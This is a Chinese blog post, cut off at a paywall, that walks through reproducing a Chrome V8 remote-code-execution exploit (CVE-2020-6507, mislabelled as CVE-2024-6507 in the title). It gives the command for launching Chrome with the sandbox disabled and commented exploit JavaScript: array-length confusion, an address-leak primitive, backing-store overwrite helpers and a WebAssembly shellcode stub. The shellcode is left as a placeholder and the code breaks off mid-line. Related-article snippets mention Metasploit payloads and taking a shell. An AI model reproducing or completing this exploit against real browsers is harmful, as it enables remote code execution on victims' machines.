Google Chrome RCE漏洞 CVE-2024-6507 和 CVE-2024-0517 流程分析

最新推荐文章于 2024-12-23 18:43:03 发布
最新推荐文章于 2024-12-23 18:43:03 发布
阅读量1k 收藏 17
点赞数 18
文章标签: chrome 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_87361210/article/details/142428622
版权

二、CVE-2020-6507 复现环境:

Win10 + Google Chrome 86.0.4240.75

三、CVE-2020-6507 利用复现:

关闭沙箱安全使用命令进行关闭 ,在正常情况下,浏览器沙箱提供了一个受限制的执行环境,以防止恶意代码对用户系统的损害。关闭沙箱可能会导致浏览器执行环境的变化,使其更容易受到攻击。这在某些情况下可能有助于进行特定类型的漏洞研究和安全测试。

“C:\Program Files\Google\Chrome\Application\chrome.exe” -no-sandbox
在这里插入图片描述

四、EXP核心分析:

// 漏洞利用的HTML代码
<script>
 // 触发垃圾回收以促使后续的内存布局
 function gc() {
 for (var i = 0; i < 0x80000; ++i) {
 var a = new ArrayBuffer();
 }
 }

 // Shellcode,实际上是一个汇编代码的字节序列
 let shellcode = [...]; // 替换为实际的 shellcode

 // WebAssembly 模块的字节码数据
 var wasmCode = new Uint8Array([ /\* WebAssembly 模块的字节码数据 \*/ ]);
 
 // 创建 WebAssembly 模块和实例
 var wasmModule = new WebAssembly.Module(wasmCode);
 var wasmInstance = new WebAssembly.Instance(wasmModule);
 var main = wasmInstance.exports.main;

 // ArrayBuffer 和 DataView 用于进行内存操作
 var bf = new ArrayBuffer(8);
 var bfView = new DataView(bf);
 
 // 获取浮点数的低32位
 function fLow(f) {
 bfView.setFloat64(0, f, true);
 return (bfView.getUint32(0, true));
 }

 // 获取浮点数的高32位
 function fHi(f) {
 bfView.setFloat64(0, f, true);
 return (bfView.getUint32(4, true))
 }

 // 合成一个双精度浮点数
 function i2f(low, hi) {
 bfView.setUint32(0, low, true);
 bfView.setUint32(4, hi, true);
 return bfView.getFloat64(0, true);
 }

 // 将浮点数转换为大端序的64位无符号整数
 function f2big(f) {
 bfView.setFloat64(0, f, true);
 return bfView.getBigUint64(0, true);
 }

 // 将大端序的64位无符号整数转换为浮点数
 function big2f(b) {
 bfView.setBigUint64(0, b, true);
 return bfView.getFloat64(0, true);
 }

 // 定义一个 ArrayBuffer 的子类,用于进行内存操作
 class LeakArrayBuffer extends ArrayBuffer {
 constructor(size) {
 super(size);
 this.slot = 0xb33f;
 }
 }

 // 在调用 foo 之前进行多次操作,包括触发垃圾回收
 function foo(a) {
 let x = -1;
 if (a) x = 0xFFFFFFFF;

 var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
 arr.shift();
 let local\_arr = Array(2);
 local\_arr[0] = 5.1;
 let buff = new LeakArrayBuffer(0x1000);
 arr[0] = 0x1122;
 
 return [arr, local\_arr, buff];
 }

 for (var i = 0; i < 0x10000; ++i)
 foo(false);

 gc(); gc();

 // 调用 foo,获取相关数组和内存对象
 [corrput\_arr, rwarr, corrupt\_buff] = foo(true);

 // 利用漏洞进行内存操作
 corrput\_arr[12] = 0x22444;
 delete corrput\_arr;

 // 对内存进行操作,获取相关信息
 function setbackingStore(hi, low) {
 rwarr[4] = i2f(fLow(rwarr[4]), hi);
 rwarr[5] = i2f(low, fHi(rwarr[5]));
 }

 function leakObjLow(o) {
 corrupt\_buff.slot = o;
 return (fLow(rwarr[9]) - 1);
 }

 let corrupt\_view = new DataView(corrupt\_buff);
 let corrupt\_bu
最低0.47元/天 解锁文章
CVE-2020-6418漏洞复现:Chrome无沙箱RCE的详细步骤
qq_56171392的博客
12-18 572
Chrome的沙箱机制通常可以有效隔离网页内容与系统资源,但在此漏洞的影响下,攻击者能够绕过这一保护。该漏洞的根本原因在于Chrome内存管理中的缺陷。具体来说,攻击者可以构造一个恶意的JavaScript负载,使得Chrome在处理过程中出现内存损坏,进而导致任意代码的执行。CVE-2020-6418是一个影响Google Chrome浏览器的高危漏洞,允许攻击者在无沙箱环境下执行任意代码(RCE)。这一漏洞的存在使得攻击者能够绕过Chrome的安全机制,从而对受害者的系统造成严重威胁。
Google Chrome RCE漏洞 CVE-2024-6507 CVE-2024-0517 流程分析(2)
2401_87361192的博客
09-22 1401
两个CVE漏洞都是V8引起那么我们简单认识一下,这个V8到底是什么东西?答:V8 是 Google 的开源高性能 JavaScript WebAssembly 引擎,用 C++ 编写。它用于 Chrome Node.js 这个V8涉及内容及其的多如果需要完全吸收是需要花时间的,这里我把【Chrome 浏览器利用,第 1 部分:V8 JavaScript 内部结构简介】
Chrome RCE 漏洞复现
最新发布
明弟有理想的博客
12-23 990
Google Chrome是由Google开发的免费网页浏览器,大量采用Chrome内核的浏览器同样也会受此漏洞影响。攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行。由于Chrome浏览器会默认开启沙盒,可以拦截利用该漏洞发起的攻击,所以一般用户不会受到影响。这里尝试太低版本也复现不成功,80版的一般可以,且有如下几个限制。使用Chrome内核的其它浏览器,也会受到此漏洞影响。快捷方式右键-属性-快捷方式-目标 处加上。,即以无沙盒模式启动。打开该快捷方式即上线。
Google Chrome RCE漏洞 CVE-2020-6507 CVE-2024-0517 流程分析
黑剑
01-25 3829
Google Chrome 在关闭沙箱安全情况下,通过EXP进行远程代码执行
谷歌修复Chrome Dev 频道中严重的 RCE 漏洞
smellycat000的专栏
05-30 333
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士谷歌 Chrome 基于 Chromium 浏览器使用的V8 JavaScript WebAssembly 引擎中存在一个严重的远程代码执行漏洞,目前已修复。该漏洞指令优化组件中的释放后使用漏洞有关,该漏洞遭成功利用可“导致攻击者在浏览器上下文中执行任意代码”。该漏洞存在于 Dev 频道版本 Chrome 101...
Google Chrome RCE漏洞 CVE-2024-6507 CVE-2024-0517 流程分析(1)
2401_87361150的博客
09-22 1014
两个CVE漏洞都是V8引起那么我们简单认识一下,这个V8到底是什么东西?答:V8 是 Google 的开源高性能 JavaScript WebAssembly 引擎,用 C++ 编写。它用于 Chrome Node.js 这个V8涉及内容及其的多如果需要完全吸收是需要花时间的,这里我把【Chrome 浏览器利用,第 1 部分:V8 JavaScript 内部结构简介】
Linux 下复现 Google Chrome RCE
zyer
12-13 1250
Linux服务器复现google chrome rce
Chrome 远程代码执行漏洞复现
玄道的网安博客
04-14 527
漏洞概述 攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行 此漏洞无法完成chrome的沙箱逃逸,默认情况下chrome开启沙箱。如需无条件rce还需要沙箱逃逸的漏洞。 影响版本 Google:Chrome: <=89.0.4389.114 环境搭建 这里用Chrome 89.0.4389.90进行测试 开始之前,要将Chrome的sandbox关闭,直接在chrome的快捷方式--属性---位置/目标---移动到...
Chrome浏览器远程代码执行漏洞(无沙箱模式)
曹振国的博客
07-28 1365
文章目录一、漏洞描述二、漏洞影响范围三、漏洞复现1.利用msf生成payload2.生成exp页面3.启动msf监听4.将谷歌浏览器以无沙盒模式运行5.运行html文件,msf成功拿shell 一、漏洞描述 安全公告编号:CNTA-2021-0015 2021年4月14日,国家信息安全漏洞共享平台(CNVD)收录了Google Chrome远程代码执行漏洞(CNVD-2021-27989)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞细节已公开,厂商已发布新版本修复该漏洞。 二、漏洞影响范围
CVE-2021-21220 Chrome远程代码执行漏洞复现
m0_56642842的博客
06-30 2808
0x00 简介 Google Chrome浏览器是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度安全性,并创造出简单且有效率的使用者界面。 通过CVE-2021-21220漏洞,受害者通过未开沙箱机制的Chrome浏览器打开攻击者置入恶意代码的网页后就会执行攻击者想要执行的任意代码。 微信作为腾讯公司发布的一款聊天工具。通过PC端微信用户可以直接在电脑上接受手机微信上的任何信息,例如接收:文字、图片、语音、视频等功能。这款软件是腾讯公司为了方
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
huangyongkang666的博客
06-11 5520
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现
huangyongkang666的博客
11-18 4960
Google Chrome 任意文件读取漏洞(CVE-2023-4357)
Google Chrome 任意文件读取 (CVE-2023-4357)漏洞
weixin_62693307的博客
11-20 1416
中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器(如 chrome,safari 等)中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制,从 http(s):// 网址访问 file:// 网址并获取文件访问权限。
谷歌浏览器任意文件访问漏洞CVE-2023-4357)复现
fly夏天的博客
11-21 2046
谷歌浏览器任意文件访问漏洞CVE-2023-4357)复现
Chrome 渲染器中的对象转换到 RCE
技术超强的网络安全平台
08-24 1019
在这种情况下,更新已弃用的映射会导致它意外地变成字典映射,特别是,生成的字典映射被假定输入是快速映射的代码使用。为了绕过 v8 堆沙箱,我修改了 v8 中 Blink 对象的包装器 API 对象,从而导致堆沙箱外部的对象发生类型混淆。,但由于堆沙箱的原因,它们实际上并未作为指针存储在 v8 对象中,而是作为查找表的索引,该查找表在 v8 堆中受到保护以防止被修改。,从而导致它访问红色框中的值,并将其用作属性的值。,然后使用伪造的双精度数组中的 OOB 读取原语来读取存储在此数组中的对象的地址。
RCE(远程命令/代码执行漏洞)原理及复现
qq_41679358的博客
08-15 9583
本文转自行云博客https://www.xy586.top/ 作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格.
Chrome爆高危远程代码执行漏洞,赶紧更新!
blackorbird的博客
03-07 425
漏洞出现问题的地方在于一个APIFileReader是一个标准的API,旨在允许web应用程序异步读取存储在用户计算机上文件(或原始数据缓冲区)的内容,通过‘Fi...
深入分析CVE-2020-35728漏洞:Jackson-databind的RCE风险
'cve-2020-35728'则是这个特定安全漏洞的通用标识符,它在安全社区中被用来唯一标识这个漏洞,让开发者安全研究人员能够快速识别讨论有关该漏洞的信息。 由于 CVE-2020-35728 可能导致的严重后果,建议所有受...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值